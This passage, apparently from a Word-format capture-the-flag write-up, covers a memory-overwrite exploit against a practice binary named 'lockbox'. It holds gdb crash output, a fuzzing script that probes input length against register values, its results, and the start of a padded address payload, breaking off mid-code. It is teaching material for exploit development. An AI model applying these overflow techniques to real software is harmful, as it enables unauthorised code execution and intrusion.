    <w:p w14:paraId="07E94C1D" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">The first challenge in </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is getting past the segmentation fault that happens at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00000000004012a4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9B6" w14:paraId="154EDC11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229A522A" w14:textId="7C02E161" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x00000000004012a4</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB49B6">
              <w:t xml:space="preserve"> &lt;+172&gt;:   mov    %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:t>rdx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:t>,(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:t>%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F608BFD" w14:textId="380BDF02" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Segfault Line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E72992" w14:textId="7D4E13E8" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">The program attempts to move the data stored in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> register into the address stored in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. However, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> does not hold a valid address, which causes the program to crash when it attempts to access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9B6" w14:paraId="57774F90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1FCB1ABB" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6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4DCD2EC8" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">└─$ </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>gdb .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">/lockbox    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538886FF" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>I've locked my shell in a lockbox, you'll never get it now!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AFC465" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>But give it your best try, what's the combination?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0E35C6" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5531DA06" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>1337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74860400" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54545C73" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="436B89B5" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x00000000004012a4</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8ECE1B" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) info registers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AF8B14" w14:textId="7485A41E" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">            0x0                 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5584BA5C" w14:textId="465E818A" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Segfault Line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEE4538" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t>The following script sends an increasing number of characters to the program and outputs the stack and register values at the comp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9B6" w14:paraId="036C5178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126A4288" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def fuzz(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11871328" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>data = 'A' * 16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F69E68" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>n = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6127AA16" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6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break *0x00000000004012a4")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B4F192" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DA4573D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</w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"############################")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B399E5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</w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"# Now with " + str(n + 16) + " As           #")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5923E51E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</w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"############################")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5119A490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r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCAFB08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"&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="090D5021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  <w:t>payload = data + 'A' * n + "\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC7BCE1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.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA5FB1A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  <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>p.interactive</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9ED57D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"Breakpoint ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2170C300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  <w:t xml:space="preserve">d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>p.recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF59F61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</w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">"Breakpoint " + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(d))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F037E9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rintStack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>p, 20)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="649DC03B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getInfoRegs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E4886E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  <w:t>n += 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64529423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c")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F09FB0D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.recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CF0F09F" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>if n == 23:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA5E5C2" w14:textId="524BE7DD" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>break</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D7E2429" w14:textId="119C43FF" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828591A" w14:textId="1D0A0129" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The results show that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D6E6B" w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> starts to be overwritten after </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stores the allotted 16 characters of input on the st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6E6B" w14:paraId="17B3AB63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1373A579" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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569FDEBF" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 newdbg.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E312807" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>############################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ED98695" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t># Now with 16 As           #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0CED81" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>############################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D002C81" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 1, 0x00000000004012a4 in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB82501" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddb0:    0x41414141    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="057096E5" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddc0:    0x00000000    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x00000000</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x00000000</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x00000000</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="44DCA172" w14:textId="7B1D8B32" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">            0x0                 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F2A7B63" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>############################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BCC7128" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t># Now with 17 As           #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1E16D2" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>############################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365E69E8" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 1, 0x00000000004012a4 in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F11A73F" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddb0:    0x41414141    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4349FE0B" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddc0:    0x00000041    0x00000000    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x00000000</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x00000000</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0D9EB7C8" w14:textId="37720649" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">            0x41                65</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFD1EBE" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35912382" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>############################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C0C0CD1" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t># Now with 20 As           #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1554788F" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>############################</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A1B620" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 1, 0x00000000004012a4 in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD4E1F6" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddb0:    0x41414141    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="43ED6944" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddc0:    0x41414141    0x00000000    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x00000000</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x00000000</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3B85D11A" w14:textId="05EC39D0" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">            0x41414141          1094795585</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62C2BFBE" w14:textId="17EDC83B" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing Script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F8CB1" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">Sending a payload with 16 characters of padding followed by a valid address will prevent the program from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>segfaulting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The following example uses the address of </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ke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6E6B" w14:paraId="53BDCFBE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41A5DD1E" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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keyPld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13208D23" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">base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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,16)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5790F56C" w14:textId="77777777" w:rsidR="007431EA" w:rsidRDefault="001D6E6B" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">key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50), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0x40),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D324E5" w14:textId="3BFF74F1" w:rsidR="001D6E6B" w:rsidRDefault="007431EA" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r w:rsidRPr="007431EA">
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="001D6E6B">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="001D6E6B">
              <w:t xml:space="preserve">("B", 0x40), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001D6E6B">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001D6E6B">
              <w:t>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="593B5356" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">pad0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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,4)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2845DA69" w14:textId="149C6BDF" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
